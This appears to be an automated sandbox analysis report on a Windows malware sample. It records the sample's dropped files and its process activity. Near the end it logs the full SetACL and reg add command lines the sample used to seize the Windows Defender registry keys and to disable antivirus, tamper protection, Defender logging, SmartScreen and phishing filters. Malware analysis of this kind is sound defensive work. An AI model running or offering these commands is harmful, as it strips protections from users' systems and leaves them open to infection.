Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: 3Dut8dFCwD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source:	Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, win_version_csharp.exe.0.dr
Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: cabweejcuqvpws.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Source: win_version_csharp.exe.0.dr

Static PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]

Source: SetACL64.exe.0.dr

Static PE information: section name: _RDATA

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	File created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	File created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	File created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	File created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	File created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF697071DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00007FF697071DAC

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_4-43007

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

API coverage: 9.6 %

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe TID: 5608

Thread sleep count: 130 > 30

Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C40
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00406891 FindFirstFileW,FindClose,	0_2_00406891
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	4_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	4_2_00007FF69706CF15
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF69706CF15

Source: SetACL64.exe, 00000005.00000002.2070425441.000001890B657000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: SetACL64.exe, 00000004.00000002.2068840743.000001BD79A17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqqw
Source: SetACL64.exe, 00000006.00000002.2072226192.0000028B93EF1000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.2074288448.000002256D1A8000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000009.00000002.2080111958.000002544A948000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.2081460809.000001DDB8614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL64.exe, 00000008.00000002.2076437537.000001F7FECD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: SetACL64.exe, 0000000B.00000002.2083074027.0000029B8B3A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

API call chain: ExitProcess graph end node

graph_0-3464

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF6970786C8

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF69708D744 GetProcessHeap,

4_2_00007FF69708D744

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF6970786C8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697073034 SetUnhandledExceptionFilter,	4_2_00007FF697073034
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697072E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF697072E8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697072AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF697072AE0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF6970786C8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697073034 SetUnhandledExceptionFilter,	5_2_00007FF697073034
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697072E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF697072E8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697072AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF697072AE0

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
